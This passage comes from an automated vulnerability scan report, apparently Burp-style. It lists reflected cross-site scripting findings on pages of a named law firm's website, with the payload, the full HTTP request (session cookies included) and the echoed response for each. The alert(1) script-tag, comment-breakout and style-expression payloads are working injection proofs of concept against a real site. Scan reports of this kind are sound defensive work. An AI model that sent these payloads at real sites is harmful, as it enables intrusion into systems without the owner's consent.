<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wiggin and Da
...[SNIP]...
<!-- /alumniregistration.aspx?bcdf3--><script>alert(1)</script>547157555d1=1 Rendered in 0.03125 sec. -->
5.77. http://www.wiggin.com/areas.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /areas.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 67575'style%3d'x%3aexpression(alert(1))'a172d2a1245 was submitted in the REST URL parameter 1. This input was echoed as 67575'style='x:expression(alert(1))'a172d2a1245 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /areas.aspx67575'style%3d'x%3aexpression(alert(1))'a172d2a1245 HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.1.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:03:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16393


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/areas.aspx67575'style='x:expression(alert(1))'a172d2a1245&PrintPage=True'>
...[SNIP]...
5.78. http://www.wiggin.com/areas.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /areas.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4f6d'><script>alert(1)</script>c852467d399 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /areas.aspx?c4f6d'><script>alert(1)</script>c852467d399=1 HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.1.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 16:03:17 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 30663


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wiggin and Da
...[SNIP]...
<a id="printthispage" target="_blank" href='areas.aspx?c4f6d'><script>alert(1)</script>c852467d399=1&PrintPage=True'>
...[SNIP]...
5.79. http://www.wiggin.com/areas.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /areas.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bd62c--><script>alert(1)</script>65a3e3cadf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /areas.aspx?bd62c--><script>alert(1)</script>65a3e3cadf=1 HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.1.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 16:03:18 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 30663


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wiggin and Da
...[SNIP]...
<!-- /areas.aspx?bd62c--><script>alert(1)</script>65a3e3cadf=1 Rendered in 0.078125 sec. -->
5.80. http://www.wiggin.com/bios.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /bios.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84ce7'style%3d'x%3aexpression(alert(1))'0c9d4ceae70 was submitted in the REST URL parameter 1. This input was echoed as 84ce7'style='x:expression(alert(1))'0c9d4ceae70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bios.aspx84ce7'style%3d'x%3aexpression(alert(1))'0c9d4ceae70 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 12 May 2011 17:05:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16387


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/bios.aspx84ce7'style='x:expression(alert(1))'0c9d4ceae70&PrintPage=True'>
...[SNIP]...
5.81. http://www.wiggin.com/bios.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /bios.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e49e0'><script>alert(1)</script>5cafd9f84e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bios.aspx?e49e0'><script>alert(1)</script>5cafd9f84e1=1 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 17:05:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 121430


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wiggin and Da
...[SNIP]...
<a id="printthispage" target="_blank" href='bios.aspx?e49e0'><script>alert(1)</script>5cafd9f84e1=1&PrintPage=True'>
...[SNIP]...
5.82. http://www.wiggin.com/bios.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /bios.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7fab5--><script>alert(1)</script>d7626c5c14d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /bios.aspx?7fab5--><script>alert(1)</script>d7626c5c14d=1 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 17:05:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 121436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wiggin and Da
...[SNIP]...
<!-- /bios.aspx?7fab5--><script>alert(1)</script>d7626c5c14d=1 Rendered in 0.03125 sec. -->
5.83. http://www.wiggin.com/careers.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /careers.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c6091'style%3d'x%3aexpression(alert(1))'07ae93a26f7 was submitted in the REST URL parameter 1. This input was echoed as c6091'style='x:expression(alert(1))'07ae93a26f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /careers.aspxc6091'style%3d'x%3aexpression(alert(1))'07ae93a26f7 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 12 May 2011 17:05:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16397


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/careers.aspxc6091'style='x:expression(alert(1))'07ae93a26f7&PrintPage=True'>
...[SNIP]...
5.84. http://www.wiggin.com/careers.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /careers.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c0372--><script>alert(1)</script>0fcd795efab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /careers.aspx?c0372--><script>alert(1)</script>0fcd795efab=1 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 17:05:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 23817


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wiggin and Da
...[SNIP]...
<!-- /careers.aspx?c0372--><script>alert(1)</script>0fcd795efab=1 Rendered in 0.03125 sec. -->
5.85. http://www.wiggin.com/careers.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /careers.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a660a'><script>alert(1)</script>c1e69d80406 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /careers.aspx?a660a'><script>alert(1)</script>c1e69d80406=1 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 17:05:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 23815


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wiggin and Da
...[SNIP]...
<a id="printthispage" target="_blank" href='careers.aspx?a660a'><script>alert(1)</script>c1e69d80406=1&PrintPage=True'>
...[SNIP]...
5.86. http://www.wiggin.com/index.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /index.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 241da'style%3d'x%3aexpression(alert(1))'a7c89bd5e68 was submitted in the REST URL parameter 1. This input was echoed as 241da'style='x:expression(alert(1))'a7c89bd5e68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /index.aspx241da'style%3d'x%3aexpression(alert(1))'a7c89bd5e68 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 12 May 2011 17:06:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19098


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/index.aspx241da'style='x:expression(alert(1))'a7c89bd5e68&PrintPage=True'>
...[SNIP]...
5.87. http://www.wiggin.com/index.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /index.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db9f3'><script>alert(1)</script>8a50b905008 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.aspx?db9f3'><script>alert(1)</script>8a50b905008=1 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 17:05:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 23340


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a id="printthispage" target="_blank" href='index.aspx?db9f3'><script>alert(1)</script>8a50b905008=1&PrintPage=True'>
...[SNIP]...
5.88. http://www.wiggin.com/index.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /index.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7a881--><script>alert(1)</script>615a6804955 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index.aspx?7a881--><script>alert(1)</script>615a6804955=1 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 17:05:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 23343


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<!-- /index.aspx?7a881--><script>alert(1)</script>615a6804955=1 Rendered in 0.109375 sec. -->
5.89. http://www.wiggin.com/resource/404.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /resource/404.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 37806'style%3d'x%3aexpression(alert(1))'59cb0a41591 was submitted in the REST URL parameter 2. This input was echoed as 37806'style='x:expression(alert(1))'59cb0a41591 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /resource/404.aspx37806'style%3d'x%3aexpression(alert(1))'59cb0a41591 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 12 May 2011 17:06:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16415


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/resource/404.aspx37806'style='x:expression(alert(1))'59cb0a41591&PrintPage=True'>
...[SNIP]...
5.90. http://www.wiggin.com/resource/cal.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /resource/cal.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 652ad'style%3d'x%3aexpression(alert(1))'c81cbc591fa was submitted in the REST URL parameter 1. This input was echoed as 652ad'style='x:expression(alert(1))'c81cbc591fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /resource652ad'style%3d'x%3aexpression(alert(1))'c81cbc591fa/cal.js HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/alumniregistration.aspx
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.5.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:13:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16407


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/resource652ad'style='x:expression(alert(1))'c81cbc591fa/cal.js&PrintPage=True'>
...[SNIP]...
5.91. http://www.wiggin.com/resource/cal.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /resource/cal.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b4963'style%3d'x%3aexpression(alert(1))'18f9ba530af was submitted in the REST URL parameter 2. This input was echoed as b4963'style='x:expression(alert(1))'18f9ba530af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /resource/cal.jsb4963'style%3d'x%3aexpression(alert(1))'18f9ba530af HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/alumniregistration.aspx
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.5.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:13:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16407


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/resource/cal.jsb4963'style='x:expression(alert(1))'18f9ba530af&PrintPage=True'>
...[SNIP]...
5.92. http://www.wiggin.com/resource/cal.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /resource/cal.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e6e34'><script>alert(1)</script>b030f7a5378 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resource/cal.js?e6e34'><script>alert(1)</script>b030f7a5378=1 HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
